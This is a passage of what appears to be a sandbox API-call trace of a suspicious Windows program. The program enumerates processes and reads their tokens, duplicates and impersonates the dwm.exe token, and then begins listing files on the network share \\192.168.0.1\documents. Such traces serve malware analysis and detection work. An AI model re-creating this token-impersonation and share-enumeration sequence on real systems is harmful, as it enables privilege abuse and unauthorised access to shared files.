TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.822] CloseHandle (hObject=0x38c) returned 1 [0075.822] CloseHandle (hObject=0x2d0) returned 1 [0075.822] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0075.823] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x16c) returned 0x2d0 [0075.823] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.824] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.824] CloseHandle (hObject=0x38c) returned 1 [0075.824] CloseHandle (hObject=0x2d0) returned 1 [0075.824] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0075.825] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x2d0 [0075.825] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.825] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.825] CloseHandle (hObject=0x38c) returned 1 [0075.825] CloseHandle (hObject=0x2d0) returned 1 [0075.825] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0075.826] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a0) returned 0x2d0 [0075.826] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.826] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.826] CloseHandle (hObject=0x38c) returned 1 [0075.826] CloseHandle (hObject=0x2d0) returned 1 [0075.826] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0075.827] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c4) returned 0x2d0 [0075.827] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.827] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.828] CloseHandle (hObject=0x38c) returned 1 [0075.828] CloseHandle (hObject=0x2d0) returned 1 [0075.828] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0075.829] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1cc) returned 0x2d0 [0075.829] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.829] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.829] CloseHandle (hObject=0x38c) returned 1 [0075.829] CloseHandle (hObject=0x2d0) returned 1 [0075.829] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x16c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0075.830] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d4) returned 0x2d0 [0075.830] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.830] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.830] CloseHandle (hObject=0x38c) returned 1 [0075.830] CloseHandle (hObject=0x2d0) returned 1 [0075.830] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0075.831] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x244) returned 0x2d0 [0075.832] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x0) returned 0 [0075.832] CloseHandle (hObject=0x2d0) returned 1 [0075.832] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0075.833] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x288) returned 0x2d0 [0075.833] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x0) returned 0 [0075.833] CloseHandle (hObject=0x2d0) returned 1 [0075.833] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0075.834] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2bc) returned 0x2d0 [0075.834] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x0) returned 0 [0075.834] CloseHandle (hObject=0x2d0) returned 1 [0075.834] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0075.835] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x2d0 [0075.835] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.835] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.835] CloseHandle (hObject=0x38c) returned 1 [0075.835] CloseHandle (hObject=0x2d0) returned 1 [0075.835] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x36, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0075.836] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x2d0 [0075.836] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.837] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.837] CloseHandle (hObject=0x38c) returned 1 [0075.837] CloseHandle (hObject=0x2d0) returned 1 [0075.837] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0075.838] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f0) returned 0x2d0 [0075.838] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x0) returned 0 [0075.838] CloseHandle (hObject=0x2d0) returned 1 [0075.838] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0075.839] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x368) returned 0x2d0 [0075.839] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.839] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.839] DuplicateToken (in: ExistingTokenHandle=0x38c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x393ff28 | out: DuplicateTokenHandle=0x393ff28*=0x390) returned 1 [0075.839] SetThreadToken (Thread=0x0, Token=0x390) returned 1 [0075.839] CloseHandle (hObject=0x390) returned 1 [0075.839] CloseHandle (hObject=0x38c) returned 1 [0075.839] CloseHandle (hObject=0x2d0) returned 1 [0075.840] CloseHandle (hObject=0x388) returned 1 [0075.840] lstrcmpiW (lpString1="C:\\", lpString2="\\\\192.168.0.1\\documents") returned 1 [0075.840] wsprintfW (in: param_1=0x393fad0, param_2="%s\\*" | out: param_1="\\\\192.168.0.1\\documents\\*") returned 25 [0075.840] FindFirstFileExW (lpFileName="\\\\192.168.0.1\\documents\\*" (normalized: "\\\\192.168.0.1\\documents\\*"), fInfoLevelId=0x0, lpFindFileData=0x393fce0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0) Thread: id = 23 os_tid = 0xfd4 [0076.801] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x260ff48 | out: TokenHandle=0x260ff48*=0x3ac) returned 1 [0076.801] GetTokenInformation (in: TokenHandle=0x3ac, TokenInformationClass=0x12, TokenInformation=0x260ff44, TokenInformationLength=0x4, ReturnLength=0x260ff4c | out: TokenInformation=0x260ff44, ReturnLength=0x260ff4c) returned 1 [0076.801] GetTokenInformation (in: TokenHandle=0x3ac, TokenInformationClass=0x13, TokenInformation=0x260ff44, TokenInformationLength=0x4, ReturnLength=0x260ff4c | out: TokenInformation=0x260ff44, ReturnLength=0x260ff4c) returned 1 [0076.802] GetTokenInformation (in: TokenHandle=0x3a4, TokenInformationClass=0xa, TokenInformation=0x260ff50, TokenInformationLength=0x38, ReturnLength=0x260ff4c | out: TokenInformation=0x260ff50, ReturnLength=0x260ff4c) returned 1 [0076.802] CloseHandle (hObject=0x3a4) returned 1 [0076.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4 [0076.808] Process32FirstW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0076.809] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0076.809] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0076.810] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x3a0 [0076.811] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x0) returned 0 [0076.811] CloseHandle (hObject=0x3a0) returned 1 [0076.811] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0076.812] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x3a0 [0076.812] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.812] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.812] CloseHandle (hObject=0x3a8) returned 1 [0076.812] CloseHandle (hObject=0x3a0) returned 1 [0076.812] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.816] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x3a0 [0076.817] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.817] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.817] CloseHandle (hObject=0x3a8) returned 1 [0076.817] CloseHandle (hObject=0x3a0) returned 1 [0076.817] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0076.818] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x16c) returned 0x3a0 [0076.818] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.818] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.818] CloseHandle (hObject=0x3a8) returned 1 [0076.818] CloseHandle (hObject=0x3a0) returned 1 [0076.818] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0076.820] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x3a0 [0076.820] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.820] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.820] CloseHandle (hObject=0x3a8) returned 1 [0076.820] CloseHandle (hObject=0x3a0) returned 1 [0076.820] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0076.821] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a0) returned 0x3a0 [0076.821] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.821] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.821] CloseHandle (hObject=0x3a8) returned 1 [0076.821] CloseHandle (hObject=0x3a0) returned 1 [0076.821] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0076.823] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c4) returned 0x3a0 [0076.823] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.823] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.823] CloseHandle (hObject=0x3a8) returned 1 [0076.823] CloseHandle (hObject=0x3a0) returned 1 [0076.823] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0076.824] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1cc) returned 0x3a0 [0076.824] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.824] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.824] CloseHandle (hObject=0x3a8) returned 1 [0076.824] CloseHandle (hObject=0x3a0) returned 1 [0076.824] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x16c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0076.826] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d4) returned 0x3a0 [0076.826] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.826] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.826] CloseHandle (hObject=0x3a8) returned 1 [0076.826] CloseHandle (hObject=0x3a0) returned 1 [0076.826] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.827] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x244) returned 0x3a0 [0076.827] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x0) returned 0 [0076.827] CloseHandle (hObject=0x3a0) returned 1 [0076.827] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.828] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x288) returned 0x3a0 [0076.829] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x0) returned 0 [0076.829] CloseHandle (hObject=0x3a0) returned 1 [0076.829] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.830] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2bc) returned 0x3a0 [0076.830] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x0) returned 0 [0076.830] CloseHandle (hObject=0x3a0) returned 1 [0076.830] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.832] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x3a0 [0076.832] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.832] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.832] CloseHandle (hObject=0x3a8) returned 1 [0076.832] CloseHandle (hObject=0x3a0) returned 1 [0076.832] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x36, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.833] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x3a0 [0076.833] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.833] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.833] CloseHandle (hObject=0x3a8) returned 1 [0076.833] CloseHandle (hObject=0x3a0) returned 1 [0076.833] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0076.835] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f0) returned 0x3a0 [0076.835] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x0) returned 0 [0076.835] CloseHandle (hObject=0x3a0) returned 1 [0076.835] Process32NextW (in: hSnapshot=0x3a4, lppe=0x260fcb0 | out: lppe=0x260fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0076.836] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x368) returned 0x3a0 [0076.836] OpenProcessToken (in: ProcessHandle=0x3a0, DesiredAccess=0xa, TokenHandle=0x260ff2c | out: TokenHandle=0x260ff2c*=0x3a8) returned 1 [0076.836] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0xa, TokenInformation=0x260fee0, TokenInformationLength=0x38, ReturnLength=0x260ff1c | out: TokenInformation=0x260fee0, ReturnLength=0x260ff1c) returned 1 [0076.836] DuplicateToken (in: ExistingTokenHandle=0x3a8, ImpersonationLevel=0x2, DuplicateTokenHandle=0x260ff28 | out: DuplicateTokenHandle=0x260ff28*=0x3b4) returned 1 [0076.836] SetThreadToken (Thread=0x0, Token=0x3b4) returned 1 [0076.836] CloseHandle (hObject=0x3b4) returned 1 [0076.836] CloseHandle (hObject=0x3a8) returned 1 [0076.837] CloseHandle (hObject=0x3a0) returned 1 [0076.837] CloseHandle (hObject=0x3a4) returned 1 Thread: id = 29 os_tid = 0xb88 [0096.118] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d3ff48 | out: TokenHandle=0x3d3ff48*=0x3b8) returned 1 [0096.118] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x12, TokenInformation=0x3d3ff44, TokenInformationLength=0x4, ReturnLength=0x3d3ff4c | out: TokenInformation=0x3d3ff44, ReturnLength=0x3d3ff4c) returned 1 